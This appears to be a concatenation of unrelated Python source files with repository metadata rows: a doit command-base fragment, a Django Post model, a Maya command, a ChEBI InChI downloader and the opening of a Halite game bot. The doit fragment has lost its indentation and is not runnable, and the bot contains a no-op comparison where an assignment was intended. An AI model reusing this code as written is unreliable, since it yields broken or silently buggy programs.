"""
if not self._cmdparser:
self._cmdparser = CmdParse(self.get_options())
self._cmdparser.overwrite_defaults(self.config_vals)
return self._cmdparser
def get_options(self):
"""@reutrn list of CmdOption
"""
return [CmdOption(opt) for opt in self.cmd_options]
def execute(self, opt_values, pos_args): # pragma: no cover
"""execute command
:param opt_values: (dict) with cmd_options values
:param pos_args: (list) of cmd-line positional arguments
"""
raise NotImplementedError()
def parse_execute(self, in_args):
"""helper. just parse parameters and execute command
@args: see method parse
@returns: result of self.execute
"""
params, args = self.cmdparser.parse(in_args)
self.pdb = params.get('pdb', False)
return self.execute(params, args)
def help(self):
"""return help text"""
text = []
text.append("Purpose: {}".format(self.doc_purpose))
text.append("Usage: {} {} {}".format(
self.bin_name, self.name, self.doc_usage))
text.append('')
text.append("Options:")
for opt in self.cmdparser.options:
text.extend(opt.help_doc())
if self.doc_description is not None:
text.append("")
text.append("Description:")
text.append(self.doc_description)
return "\n".join(text)
######################################################################
# choose internal dependency file.
opt_depfile = {
'name': 'dep_file',
'short':'',
'long': 'db-file',
'type': str,
'default': ".doit.db",
'help': "file used to save successful runs [default: %(default)s]"
}
# dependency file DB backend
opt_backend = {
'name': 'backend',
'short':'',
'long': 'backend',
'type': str,
'default': "dbm",
'help': ("Select dependency file backend. [default: %(default)s]")
}
opt_check_file_uptodate = {
'name': 'check_file_uptodate',
'short': '',
'long': 'check_file_uptodate',
'type': str,
'default': 'md5',
'help': """\
Choose how to check if files have been modified.
Available options [default: %(default)s]:
'md5': use the md5sum
'timestamp': use the timestamp
"""
}
#### options related to dodo.py
# select dodo file containing tasks
opt_dodo = {
'name': 'dodoFile',
'short':'f',
'long': 'file',
'type': str,
'default': 'dodo.py',
'help':"load task from dodo FILE [default: %(default)s]"
}
# cwd
opt_cwd = {
'name': 'cwdPath',
'short':'d',
'long': 'dir',
'type': str,
'default': None,
'help':("set path to be used as cwd directory (file paths on " +
"dodo file are relative to dodo.py location).")
}
# seek dodo file on parent folders
opt_seek_file = {
'name': 'seek_file',
'short': 'k',
'long': 'seek-file',
'type': bool,
'default': False,
'env_var': 'DOIT_SEEK_FILE',
'help': ("seek dodo file on parent folders " +
"[default: %(default)s]")
}
class TaskLoader(object):
"""task-loader interface responsible of creating Task objects
Subclasses must implement the method `load_tasks`
:cvar cmd_options:
(list of dict) see cmdparse.CmdOption for dict format
"""
cmd_options = ()
def __init__(self):
# list of command names, used to detect clash of task names and commands
self.cmd_names = []
self.config = None # reference to config object taken from Command
def load_tasks(self, cmd, opt_values, pos_args): # pragma: no cover
"""load tasks and DOIT_CONFIG
:return: (tuple) list of Task, dict with DOIT_CONFIG options
:param cmd: (doit.cmd_base.Command) current command being executed
:param opt_values: (dict) with values for cmd_options
:param pos_args: (list str) positional arguments from command line
"""
raise NotImplementedError()
@staticmethod
def _load_from(cmd, namespace, cmd_list):
"""load task from a module or dict with module members"""
if inspect.ismodule(namespace):
members = dict(inspect.getmembers(namespace))
else:
members = namespace
task_list = loader.load_tasks(members, cmd_list, cmd.execute_tasks)
doit_config = loader.load_doit_config(members)
return task_list, doit_config
class ModuleTaskLoader(TaskLoader):
"""load tasks from a module/dictionary containing task generators
Usage: `ModuleTaskLoader(my_module)` or `ModuleTaskLoader(globals())`
"""
cmd_options = ()
def __init__(self, mod_dict):
super(ModuleTaskLoader, self).__init__()
self.mod_dict = mod_dict
def load_tasks(self, cmd, params, args):
return self._load_from(cmd, self.mod_dict, self.cmd_names)
class DodoTaskLoader(TaskLoader):
"""default task-loader create tasks from a dodo.py file"""
cmd_options = (opt_dodo, opt_cwd, opt_seek_file)
def load_tasks(self, cmd, params, args):
dodo_module = loader.get_module(
params['dodoFile'],
params['cwdPath'],
params['seek_file'])
return self._load_from(cmd, dodo_module, self.cmd_names)
class DoitCmdBase(Command):
"""
subclass must define:
cmd_options => list of option dictionary (see CmdOption)
_execute => method, argument names must be option names
"""
base_options = (opt_depfile, opt_backend, opt_check_file_uptodate)
def __init__(self, task_loader=None, cmds=None, **kwargs):
super(DoitCmdBase, self).__init__(**kwargs)
self.sel_tasks = None # selected tasks for command
self.dep_manager = None #
self.outstream = sys.stdout
self.loader = self._get_loader(task_loader, cmds)
self._backends = self.get_backends()
def get_options(self):
"""from base class - merge base_options, loader_options and cmd_options
"""
opt_list = (self.base_options + self.loader.cmd_options +
self.cmd_options)
return [CmdOption(opt) for opt in opt_list]
def _execute(self): # pragma: no cover
"""to be subclassed - actual command implementation"""
raise NotImplementedError
@staticmethod
def check_minversion(minversion):
"""check if this version of doit satisfy minimum required version
Minimum version specified by configuration on dodo.
"""
if minversion:
if version_tuple(minversion) > version_tuple(version.VERSION):
msg = ('Please update doit. '
'Minimum version required is {required}. '
'You are using {actual}. ')
raise InvalidDodoFile(msg.format(required=minversion,
actual=version.VERSION))
def get_checker_cls(self, check_file_uptodate):
"""return checker class to be used by dep_manager"""
if isinstance(check_file_uptodate, str):
if check_file_uptodate not in CHECKERS:
msg = ("No check_file_uptodate named '{}'."
" Type '{} help run' to see a list "
"of available checkers.").format(
check_file_uptodate, self.bin_name)
raise InvalidCommand(msg)
return CHECKERS[check_file_uptodate]
else:
# user defined class
return check_file_uptodate
def _get_loader(self, task_loader=None, cmds=None):
"""return task loader
:param task_loader: a TaskLoader class
:param cmds: dict of available commands
"""
loader = None
if task_loader:
loader = task_loader # task_loader set from the API
elif 'loader' in self.config_vals:
# a plugin loader
loader_name = self.config_vals['loader']
plugins = PluginDict()
plugins.add_plugins(self.config, 'LOADER')
loader = plugins.get_plugin(loader_name)()
else:
loader = DodoTaskLoader() # default loader
if cmds:
loader.cmd_names = list(sorted(cmds.keys()))
loader.config = self.config
return loader
def get_backends(self):
"""return PluginDict of DB backends, including core and plugins"""
backend_map = {'dbm': DbmDB, 'json': JsonDB, 'sqlite3': SqliteDB}
# add plugins
plugins = PluginDict()
plugins.add_plugins(self.config, 'BACKEND')
backend_map.update(plugins.to_dict())
# set choices, sub-classes might not have this option
if 'backend' in self.cmdparser:
choices = {k: getattr(v, 'desc', '') for k,v in backend_map.items()}
self.cmdparser['backend'].choices = choices
return backend_map
def execute(self, params, args):
"""load dodo.py, set attributes and call self._execute
:param params: instance of cmdparse.DefaultUpdate
:param args: list of string arguments (containing task names)
"""
self.task_list, dodo_config = self.loader.load_tasks(
self, params, args)
# merge config values from dodo.py into params
params.update_defaults(dodo_config)
self.check_minversion(params.get('minversion'))
# set selected tasks for command
self.sel_tasks = args or params.get('default_tasks')
# create dep manager
db_class = self._backends.get(params['backend'])
checker_cls = self.get_checker_cls(params['check_file_uptodate'])
# note the command have the responsibility to call dep_manager.close()
self.dep_manager = Dependency(db_class, params['dep_file'], checker_cls)
# hack to pass parameter into _execute() calls that are not part
# of command line options
params['pos_args'] = args
params['continue_'] = params.get('continue')
# magic - create dict based on signature of _execute() method.
# this done so that _execute() have a nice API with name parameters
# instead of just taking a dict.
args_name = list(inspect.signature(self._execute).parameters.keys())
exec_params = dict((n, params[n]) for n in args_name)
return self._execute(**exec_params)
# helper functions to find list of tasks
def check_tasks_exist(tasks, name_list):
"""check task exist"""
if not name_list:
return
for task_name in name_list:
if task_name not in tasks:
msg = "'%s' is not a task."
raise InvalidCommand(msg % task_name)
# this is used by commands that do not execute tasks (list, clean, forget...)
def tasks_and_deps_iter(tasks, sel_tasks, yield_duplicates=False):
"""iterator of select_tasks and its dependencies
@param tasks (dict - Task)
@param sel_tasks(list - str)
"""
processed = set() # str - task name
to_process = deque(sel_tasks) # str - task name
# get initial task
while to_process:
task = tasks[to_process.popleft()]
processed.add(task.name)
yield task
# FIXME this does not take calc_dep into account
for task_dep in task.task_dep + task.setup_tasks:
if (task_dep not in processed) and (task_dep not in to_process):
to_process.append(task_dep)
elif yield_duplicates:
yield tasks[task_dep]
def subtasks_iter(tasks, task):
"""find all subtasks for a given task
@param tasks (dict - Task)
@param task (Task)
"""
for name in task.task_dep:
dep = tasks[name]
if dep.is_subtask:
yield dep
| [
"schettino72@gmail.com"
] | schettino72@gmail.com |
60bd221d9a7201ed61317b388cf986a9fd6e682d | 8eeb9db7f4bc986a8b24c09b8af1ce10dd97689e | /posts/models.py | 4f07bafa70e93300ec6e92397229f9351b72512c | [] | no_license | jotasic/wecode_wanted | e21a400b6582ae8a5b5af7f8242f67575dc91b74 | e291513d8e6353ad6318d0894cf8f78d07d084a7 | refs/heads/main | 2023-08-29T01:36:44.595014 | 2021-10-22T02:39:20 | 2021-10-22T02:39:20 | 418,725,436 | 0 | 0 | null | 2021-10-22T02:45:28 | 2021-10-19T01:20:52 | Python | UTF-8 | Python | false | false | 430 | py | from django.db import models
from django.conf import settings
class Post(models.Model):
author = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, null=True)
title = models.CharField(max_length=255)
content = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
edited_at = models.DateTimeField(auto_now=True)
class Meta:
db_table = 'posts' | [
"embedded61@gmail.com"
] | embedded61@gmail.com |
a27851e4f4a4bde844104c7a71758141934c9c74 | 4be2c72579486ad04a00db0349028de96d2dce89 | /scripts/Helios/commands/Make Motor Boats.py | c403c602b6a5d260ed9ddd810716127baf95914c | [] | no_license | italic-r/maya-prefs | 6a617d40beee8937186b4699c5cead44e01c2d40 | aa21e5e2938dc2698ce5f555ee74a594e08aed2b | refs/heads/master | 2021-09-09T16:31:00.411349 | 2018-03-18T01:40:10 | 2018-03-18T01:40:10 | 86,961,959 | 16 | 8 | null | null | null | null | UTF-8 | Python | false | false | 19 | py | mc.MakeMotorBoats() | [
"italic.rendezvous@gmail.com"
] | italic.rendezvous@gmail.com |
57258779008b8a1bc52126eeb06abb34a183b4e5 | b850aafa66b84b8524cfd87ca6a475cd4d7f48df | /src/bio2bel_chebi/parser/inchis.py | a6a1252d6f077d7d8b260a9316a9bd1ac7e75ecf | [
"MIT"
] | permissive | bio2bel/chebi | 35a738542a6a7ff065a1c95ad8c53e5aa1b63c20 | e73a35cca08441a52117fc159d8f44364b1a8836 | refs/heads/master | 2020-06-26T04:50:09.859382 | 2019-11-13T13:37:25 | 2019-11-13T13:37:25 | 97,003,706 | 0 | 1 | MIT | 2018-11-13T15:40:54 | 2017-07-12T12:13:51 | Python | UTF-8 | Python | false | false | 1,259 | py | # -*- coding: utf-8 -*-
import logging
import os
from urllib.request import urlretrieve
import pandas as pd
from ..constants import INCHIS_DATA_PATH, INCHIS_URL
log = logging.getLogger(__name__)
def download_inchis(force_download=False):
"""Downloads the compound inchis
:param bool force_download: If true, overwrites a previously cached file
:rtype: str
"""
if os.path.exists(INCHIS_DATA_PATH) and not force_download:
log.info('using cached data at %s', INCHIS_DATA_PATH)
else:
log.info('downloading %s to %s', INCHIS_URL, INCHIS_DATA_PATH)
urlretrieve(INCHIS_URL, INCHIS_DATA_PATH)
return INCHIS_DATA_PATH
def get_inchis_df(url=None, cache=True, force_download=False):
"""Gets the compound's inchi keys
:param Optional[str] url: The URL (or file path) to download. Defaults to the ChEBI data.
:param bool cache: If true, the data is downloaded to the file system, else it is loaded from the internet
:param bool force_download: If true, overwrites a previously cached file
:rtype: pandas.DataFrame
"""
if url is None and cache:
url = download_inchis(force_download=force_download)
return pd.read_csv(
url or INCHIS_URL,
sep='\t'
)
| [
"cthoyt@gmail.com"
] | cthoyt@gmail.com |
c7097092229d956c88ee536374160c1cbf5a2ed6 | 76baf5ff0e8717ab6a17575bc9c126e7eb4e2f28 | /docker/shummie/Bots/shummiev66-11-3.py | f49835ae6e6db751bd27c5c930c4a39c68b513c1 | [] | no_license | nmalaguti/halite-bots | f0e8caf3e9898884e6476ff5d36884a2f4e07309 | 82efde39f83b5c34719d31396c7659d2c2f18c03 | refs/heads/master | 2023-07-15T01:20:00.784928 | 2023-06-29T02:49:35 | 2023-06-29T02:49:35 | 73,758,433 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 67,124 | py | # ==============================================================================
# Imports
# ==============================================================================
import functools
from functools import wraps
import cProfile
import itertools
import logging
import math
import numpy as np
import random
import scipy.sparse
import sys
import time
from timeit import default_timer as timer
import copy
# ==============================================================================
# Variables
# ==============================================================================
botname = "shummie v66-11-3"
print_maps = False
print_times = False
profile = False
MAX_TURN_TIME = 1.35
def print_map(npmap, name):
directory = "Maps/"
if print_maps:
np.savetxt(directory + name + str(game.frame) + ".txt", npmap)
def timethis(f):
@wraps(f)
def wrap(*args, **kw):
start = time.time()
result = f(*args, **kw)
end = time.time()
if print_times:
logging.debug("Frame: {0} {1} secs to run func: {2}".format(args[0].frame, end - start, f.__name__))
return result
return wrap
# ==============================================================================
# Game Class
# ==============================================================================
class Game:
def __init__(self):
self.my_id = int(get_string())
map_size_string = get_string()
self.w, self.h = tuple(map(int, map_size_string.split()))
production_map_string = get_string()
self.production_map = np.array(list(map(int, production_map_string.split()))).reshape((self.h, self.w)).transpose()
self.create_squares_list()
self.frame = -1
self.max_turns = 10 * ((self.w * self.h) ** 0.5)
self.get_frame()
self.starting_player_count = np.amax(self.owner_map) # Note, for range you'd need to increase the range by 1
self.create_one_time_maps()
self.set_configs()
send_string(botname)
def __iter__(self):
# Allows direct iteration over all squares
return itertools.chain.from_iterable(self.squares)
def get_frame(self, map_string=None):
# Updates the map information from the latest frame provided by the game environment
if map_string is None:
map_string = get_string()
split_string = map_string.split()
# The state of the map (including owner and strength values, but excluding production values) is sent in the following way:
# One integer, COUNTER, representing the number of tiles with the same owner consecutively.
# One integer, OWNER, representing the owner of the tiles COUNTER encodes.
# The above repeats until the COUNTER total is equal to the area of the map.
# It fills in the map from row 1 to row HEIGHT and within a row from column 1 to column WIDTH.
# Please be aware that the top row is the first row, as Halite uses screen-type coordinates.
owners = list()
while len(owners) < self.w * self.h:
counter = int(split_string.pop(0))
owner = int(split_string.pop(0))
owners.extend([owner] * counter)
assert len(owners) == self.w * self.h
self.owner_map = np.array(owners).reshape((self.h, self.w)).transpose()
# This is then followed by WIDTH * HEIGHT integers, representing the strength values of the tiles in the map.
# It fills in the map in the same way owner values fill in the map.
assert len(split_string) == self.w * self.h
str_list = list(map(int, split_string))
self.strength_map = np.array(str_list).reshape((self.h, self.w)).transpose()
# Update all squares
for x in range(self.w):
for y in range(self.h):
self.squares[x, y].update(self.owner_map[x, y], self.strength_map[x, y])
# Reset the move_map
self.move_map = np.ones((self.w, self.h)) * -1 # Could possibly expand this in the future to consider enemy moves...
self.moving_into_map = np.zeros((self.w, self.h))
self.frame += 1
def send_frame(self):
# Goes through each square and get the list of moves.
move_list = []
for sq in itertools.chain.from_iterable(self.squares):
if sq.owner == self.my_id:
if sq.strength == 0: # Squares with 0 strength shouldn't move.
sq.move = 4
if sq.move == -1:
# In the event we didn't actually assign a move, make sure it's coded to STILL
sq.move = 4
move_list.append(sq)
send_string(' '.join(str(square.x) + ' ' + str(square.y) + ' ' + str(translate_cardinal(square.move)) for square in move_list))
def create_squares_list(self):
self.squares = np.empty((self.w, self.h), dtype=np.object)
for x in range(self.w):
for y in range(self.h):
self.squares[x, y] = Square(self, x, y, self.production_map[x, y])
for x in range(self.w):
for y in range(self.h):
self.squares[x, y].after_init_update()
def set_configs(self):
self.str_cap = 255
self.buildup_multiplier = np.minimum(np.maximum(self.production_map, 4), 9)
self.pre_combat_threshold = -3
self.combat_radius = 5
self.production_cells_out = 12
self.phase = 0
def update_configs(self):
self.buildup_multiplier = np.minimum(np.maximum(self.production_map, 5), 5)
# self.buildup_multiplier = np.minimum(np.maximum(self.production_map, 4), 7)
self.buildup_multiplier = self.buildup_multiplier - (self.distance_from_border ** 0.4)
# self.combat_radius = int(min(max(5, self.percent_owned * self.w / 2), self.w // 2))
self.combat_radius = 7
if self.percent_owned > 0.6:
self.buildup_multiplier -= 1
self.pre_combat_threshold = 0
self.combat_radius = 10
elif self.my_production_sum / self.next_highest_production_sum > 1.1:
self.buildup_multiplier += 1
if np.sum(self.even * self.is_owned_map * self.strength_map) > np.sum(self.odd * self.is_owned_map * self.strength_map):
self.parity = 0
else:
self.parity = 1
if self.percent_owned > 0.10:
self.buildup_multiplier += 4
self.buildup_multiplier = np.minimum(self.buildup_multiplier, 230 / self.production_map_1)
def create_one_time_maps(self):
self.distance_map_no_decay = self.create_distance_map(1)
self.production_map_01 = np.maximum(self.production_map, 0.1)
self.production_map_1 = np.maximum(self.production_map, 1)
self.strength_map_01 = np.maximum(self.strength_map, 0.1)
self.strength_map_1 = np.maximum(self.strength_map, 1)
self.create_dijkstra_maps()
self.create_parity_maps()
@timethis
def create_distance_map(self, falloff=1):
# Creates a distance map so that we can easily divide a map to get ratios that we are interested in
# self.distance_map[x, y, :, :] returns an array of (width, height) that gives the distance (x, y) is from (i, j) for all i, j
# Note that the actual distance from x, y, to i, j is set to 1 to avoid divide by zero errors. Anything that utilizes this function should be aware of this fact.
# Create the base map for 0, 0
zero_zero_map = np.zeros((self.w, self.h), dtype=int)
for x in range(self.w):
for y in range(self.h):
dist_x = min(x, -x % self.w)
dist_y = min(y, -y % self.w)
zero_zero_map[x, y] = max(dist_x + dist_y, 1)
if falloff != 1:
zero_zero_map = zero_zero_map ** falloff
distance_map = np.zeros((self.w, self.h, self.w, self.h), dtype=int)
for x in range(self.w):
for y in range(self.h):
distance_map[x, y, :, :] = roll_xy(zero_zero_map, x, y)
return distance_map
@timethis
def create_dijkstra_maps(self):
h, w = self.h, self.w
cost_recov_map = self.strength_map_1 / self.production_map_01
def get_cost_recov(cellnum):
x = cellnum // h
y = cellnum % h
return cost_recov_map[x, y]
dij_recov_costs = scipy.sparse.dok_matrix((w * h, w * h))
for x in range(w):
for y in range(h):
coord = x * h + y
dij_recov_costs[coord, ((x + 1) % w) * h + ((y + 0) % h)] = get_cost_recov(((x + 1) % w) * h + ((y + 0) % h))
dij_recov_costs[coord, ((x - 1) % w) * h + ((y + 0) % h)] = get_cost_recov(((x - 1) % w) * h + ((y + 0) % h))
dij_recov_costs[coord, ((x + 0) % w) * h + ((y + 1) % h)] = get_cost_recov(((x + 0) % w) * h + ((y + 1) % h))
dij_recov_costs[coord, ((x + 0) % w) * h + ((y - 1) % h)] = get_cost_recov(((x + 0) % w) * h + ((y - 1) % h))
self.dij_recov_cost, self.dij_recov_route = scipy.sparse.csgraph.dijkstra(dij_recov_costs, return_predecessors=True)
self.dij_recov_distance_map = np.zeros((w, h, w, h))
self.dij_recov_route_map = np.zeros((w, h, w, h), dtype=int)
for x in range(self.w):
for y in range(self.h):
self.dij_recov_distance_map[x, y, :, :] = self.dij_recov_cost[x * h + y].reshape((w, h))
self.dij_recov_route_map[x, y, :, :] = self.dij_recov_route[x * h + y].reshape((w, h))
def create_parity_maps(self):
self.even = np.zeros((self.w, self.h))
for x in range(self.w):
for y in range(self.h):
self.even[x, y] = 0 if (x + y) % 2 else 1
self.odd = 1 - self.even
def update(self):
self.update_maps()
self.update_stats()
self.update_configs()
@timethis
def update_maps(self):
print_map(self.strength_map, "strength_map")
print_map(self.production_map, "production_map")
self.update_calc_maps()
self.update_owner_maps()
self.update_border_maps()
self.update_enemy_maps()
self.update_controlled_influence_production_maps()
self.update_value_production_map()
def update_calc_maps(self):
self.strength_map_01 = np.maximum(self.strength_map, 0.1)
self.strength_map_1 = np.maximum(self.strength_map, 1)
def update_owner_maps(self):
self.is_owned_map = np.zeros((self.w, self.h), dtype=int)
self.is_neutral_map = np.zeros((self.w, self.h), dtype=int)
self.is_enemy_map = np.zeros((self.w, self.h), dtype=int)
self.is_owned_map[np.where(self.owner_map == self.my_id)] = 1
self.is_neutral_map[np.where(self.owner_map == 0)] = 1
self.is_enemy_map = 1 - self.is_owned_map - self.is_neutral_map
@timethis
def update_border_maps(self):
self.border_map = np.zeros((self.w, self.h), dtype=int)
self.combat_zone_map = np.zeros((self.w, self.h), dtype=int)
self.border_map += self.is_owned_map
self.border_map += roll_xy(self.is_owned_map, 0, 1)
self.border_map += roll_xy(self.is_owned_map, 0, -1)
self.border_map += roll_xy(self.is_owned_map, 1, 0)
self.border_map += roll_xy(self.is_owned_map, -1, 0)
self.border_map = np.minimum(self.border_map, 1)
self.border_map -= self.is_owned_map
border_squares_indices = np.transpose(np.nonzero(self.border_map))
border_squares = [self.squares[c[0], c[1]] for c in border_squares_indices]
self.distance_from_border = self.flood_fill(border_squares, max(self.w, self.h), True)
self.combat_zone_map = self.border_map * (self.strength_map == 0)
if self.starting_player_count > 1 and np.sum(self.combat_zone_map) >= 1: # Breaks in single player mode otherwise.
combat_squares_indices = np.transpose(np.nonzero(self.combat_zone_map))
combat_squares = [self.squares[c[0], c[1]] for c in combat_squares_indices]
self.distance_from_combat_zone = self.flood_fill(combat_squares, max(self.w, self.h), True)
self.distance_from_combat_zone[self.distance_from_combat_zone == -1] = 9999
print_map(self.distance_from_combat_zone, "distance_from_combat_zone")
else:
self.distance_from_combat_zone = np.ones((self.w, self.h)) * 999
@timethis
def update_enemy_maps(self):
self.enemy_strength_map = np.zeros((5, self.w, self.h))
self.enemy_strength_map[0] = self.strength_map * self.is_enemy_map
self.enemy_strength_map[0] += self.is_enemy_map * 0.001
for x in range(len(self.enemy_strength_map)):
self.enemy_strength_map[x] = spread_n(self.enemy_strength_map[0], x)
print_map(self.enemy_strength_map[x], "enemy_str_" + str(x) + "_")
self.own_strength_map = np.zeros((8, self.w, self.h))
self.own_strength_map[0] = self.strength_map * self.is_owned_map
for x in range(len(self.own_strength_map)):
self.own_strength_map[x] = spread_n(self.own_strength_map[0], x)
@timethis
def update_controlled_influence_production_maps(self):
max_distance = 6
self.controlled_production_influence_map = np.zeros((max_distance + 1, self.w, self.h))
self.controlled_production_influence_map[0] = self.production_map * (self.is_enemy_map + self.is_owned_map)
for distance in range(1, max_distance + 1):
self.controlled_production_influence_map[distance] = spread_n(self.controlled_production_influence_map[distance - 1], 1)
self.controlled_production_influence_map[distance] = rebase_map(self.controlled_production_influence_map[distance - 1], False)
@timethis
def update_value_production_map(self):
self.base_value_map = np.divide(self.production_map_01, self.strength_map_1) * (self.is_neutral_map - self.combat_zone_map)
# Each neutral cell gets assigned to the closest border non-combat cell
global_targets_indices = np.transpose(np.nonzero(self.is_neutral_map - self.combat_zone_map))
global_targets = [self.squares[c[0], c[1]] for c in global_targets_indices]
self.global_border_map = np.zeros((self.w, self.h))
gb_map = self.dij_recov_distance_map * (self.border_map - self.combat_zone_map)
gb_map[gb_map == 0] = 9999
for g in global_targets:
if self.base_value_map[g.x, g.y] > 0.02:
# Find the closest border square that routes to g
gb_map = self.dij_recov_distance_map[g.x, g.y] * (self.border_map - self.combat_zone_map)
gb_map[gb_map == 0] = 9999
tx, ty = np.unravel_index(gb_map.argmin(), (self.w, self.h))
self.global_border_map[tx, ty] += self.base_value_map[g.x, g.y] / self.dij_recov_distance_map[g.x, g.y, tx, ty]
self.value_production_map = 1 / np.maximum(self.base_value_map + self.global_border_map * 0.25, 0.001)
self.value_production_map *= (self.border_map - self.combat_zone_map) * (self.enemy_strength_map[1] == 0)
self.value_production_map[self.value_production_map == 0] = 9999
turns_left = self.max_turns - self.frame
recover_threshold = turns_left * 0.6
self.value_production_map[self.value_production_map > recover_threshold] == 9999
avg_recov_threshold = 2
# avg_map_recovery = np.sum(self.strength_map * (self.border_map - self.combat_zone_map)) / np.sum(self.production_map * (self.border_map - self.combat_zone_map))
avg_map_recovery = np.sum(self.strength_map * self.border_map) / np.sum(self.production_map * self.border_map)
self.value_production_map[self.value_production_map > (avg_recov_threshold * avg_map_recovery)] = 9999
def update_stats(self):
# Updates various stats used for tracking
self.turns_left = self.max_turns - self.frame
self.percent_owned = np.sum(self.is_owned_map) / (self.w * self.h)
self.production_values = [0]
for i in range(1, self.starting_player_count + 1):
self.production_values.append(np.sum(self.production_map * (self.owner_map == i)))
self.my_production_sum = self.production_values[self.my_id]
temp_production_sum = copy.copy(self.production_values)
temp_production_sum.pop(self.my_id)
temp_production_sum.pop(0)
self.next_highest_production_sum = max(temp_production_sum)
if np.sum(self.is_owned_map * self.enemy_strength_map[4]) > 0:
self.near_enemy = True
else:
self.near_enemy = False
# Detect who we are currently in combat with
self.in_combat_with = []
combat_zone_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(self.combat_zone_map))]
for sq in combat_zone_squares:
if self.own_strength_map[1, sq.x, sq.y] > 0:
for n in sq.neighbors:
if n.owner != 0 and n.owner != self.my_id:
self.in_combat_with.append(n.owner)
self.in_combat_with = list(set(self.in_combat_with))
@timethis
def get_moves(self):
# This is the main logic controlling code.
# Find super high production cells
# self.get_pre_combat_production()
# 1 - Find combat zone cells and attack them.
if (timer() - game.start) > MAX_TURN_TIME:
return
self.get_moves_attack()
# self.get_moves_prepare_strength()
# 2 - Find production zone cells and attack them
if (timer() - game.start) > MAX_TURN_TIME:
return
self.get_moves_production()
# 3 - Move all other unassigned cells.
if (timer() - game.start) > MAX_TURN_TIME:
return
self.get_moves_other()
def get_pre_combat_production(self):
# In the event we are trying to fight in a very high production zone, reroute some attacking power to expand in this area.
potential_targets_indices = np.transpose(np.nonzero(self.border_map - self.combat_zone_map))
potential_targets = [self.squares[c[0], c[1]] for c in potential_targets_indices if (1 / self.base_value_map[c[0], c[1]] < self.pre_combat_threshold)]
if len(potential_targets) == 0:
return
potential_targets.sort(key=lambda sq: 1 / self.base_value_map[sq.x, sq.y])
best_target_value = 1 / self.base_value_map[potential_targets[0].x, potential_targets[0].y]
# anything with X of the best_value target should be considered. Let's set this to 4 right now.
while len(potential_targets) > 0 and 1 / self.base_value_map[potential_targets[0].x, potential_targets[0].y] <= (best_target_value + 1):
target = potential_targets.pop(0)
self.attack_cell(target, 2)
@timethis
def get_moves_attack(self):
# Attempts to attack all border cells that are in combat
combat_zone_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(self.combat_zone_map))]
combat_zone_squares.sort(key=lambda x: self.enemy_strength_map[2, x.x, x.y], reverse=True)
combat_zone_squares.sort(key=lambda x: self.enemy_strength_map[1, x.x, x.y], reverse=True)
# TODO: Should sort by amount of overkill damage possible.
for square in combat_zone_squares:
self.attack_cell(square, 1)
self.get_moves_breakthrough()
# Get a list of all squares within x spaces of a combat zone.
# TODO: This causes bounciness, i should probably do a floodfill of all combat zone squares instead?
combat_distance_matrix = self.flood_fill(combat_zone_squares, self.combat_radius, True)
# combat_distance_matrix[combat_distance_matrix == -1] = 0
# combat_distance_matrix[combat_distance_matrix == 1] = 0
combat_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(combat_distance_matrix))]
combat_squares = [s for s in combat_squares if s.owner == self.my_id]
combat_squares.sort(key=lambda x: x.strength, reverse=True)
combat_squares.sort(key=lambda x: self.enemy_strength_map[2, x.x, x.y], reverse=True)
combat_squares.sort(key=lambda x: self.enemy_strength_map[1, x.x, x.y], reverse=True)
print_map(combat_distance_matrix, "combat_distance_matrix_")
for square in combat_squares:
if (square.strength > 0) and (combat_distance_matrix[square.x, square.y] == 1) and (square.move == -1 or square.move == STILL):
targets = []
alt_targets = []
for n in square.neighbors:
if n.owner == 0 and n.strength == 0:
targets.append(n)
elif n.owner == self.my_id:
alt_targets.append(n)
targets.sort(key=lambda x: self.enemy_strength_map[2, x.x, x.y], reverse=True)
alt_targets.sort(key=lambda x: x.strength)
success = False
for t in targets:
success = self.move_square_to_target_simple(square, t, False)
if success:
break
if not success:
for t in targets:
success = self.move_square_to_target_simple(square, t, True)
if success:
break
# elif ((square.strength > (square.production * (self.buildup_multiplier[square.x, square.y] + self.distance_from_combat_zone[square.x, square.y]))) or square.strength > 250) and (square.parity == self.parity) and square.move == -1 and square.moving_here == []:
elif ((square.strength > (square.production * (self.buildup_multiplier[square.x, square.y] + 2))) or square.strength > 250) and (square.parity == self.parity) and square.move == -1 and square.moving_here == []:
self.move_towards_map_old(square, combat_distance_matrix)
else:
if combat_distance_matrix[square.x, square.y] > 1:
self.make_move(square, STILL, None)
@timethis
def get_moves_prepare_strength(self):
# Attempts to build up strength prior to an immediate engagement, only if we aren't already in combat
border_prepare_indices = np.transpose(np.nonzero(self.border_map * self.enemy_strength_map[1] > 0))
enemy_border_squares = [self.squares[c[0], c[1]] for c in border_prepare_indices]
if len(enemy_border_squares) > 0:
combat_distance_matrix = self.flood_fill(enemy_border_squares, 5, True)
combat_distance_matrix[combat_distance_matrix == -1] = 0
combat_squares = [self.squares[c[0], c[1]] for c in np.transpose(np.nonzero(combat_distance_matrix))]
for square in combat_squares:
if (self.distance_from_combat_zone[square.x, square.y] > 3) and (square.strength > square.production * self.buildup_multiplier[square.x, square.y] + 5) and (square.parity == self.parity) and square.move == -1 and square.moving_here == []:
self.move_towards_map_old(square, combat_distance_matrix)
elif (square.strength >= 240) and (self.own_strength_map[2, square.x, square.y] >= 750) and (combat_distance_matrix[square.x, square.y] == 1):
# Attack
targets = []
for n in square.neighbors:
if combat_distance_matrix[n.x, n.y] == 0:
targets.append(n)
targets.sort(key=lambda n: self.enemy_strength_map[1, n.x, n.y], reverse=True)
self.move_square_to_target_simple(square, targets[0], False)
elif square.move == -1:
self.make_move(square, STILL, None)
@timethis
def get_moves_production(self):
# Tries to find the best cells to attack from a production standpoint.
# Does not try to attack cells that are in combat zones.
# potential_targets_indices = np.transpose(np.nonzero((self.border_map - self.combat_zone_map) * (self.enemy_strength_map[1] == 0)))
potential_targets_indices = np.transpose(np.nonzero((self.value_production_map < 8000)))
potential_targets_one = [self.squares[c[0], c[1]] for c in potential_targets_indices]
potential_targets_one.sort(key=lambda x: self.value_production_map[x.x, x.y])
percentile = 0.85
cutoff = int(len(potential_targets_one) * percentile)
potential_targets_one = potential_targets_one[:cutoff]
potential_targets = []
for c in potential_targets_one:
target = self.squares[c.x, c.y]
value = self.value_production_map[c.x, c.y]
cells_out = 1
while cells_out <= self.production_cells_out:
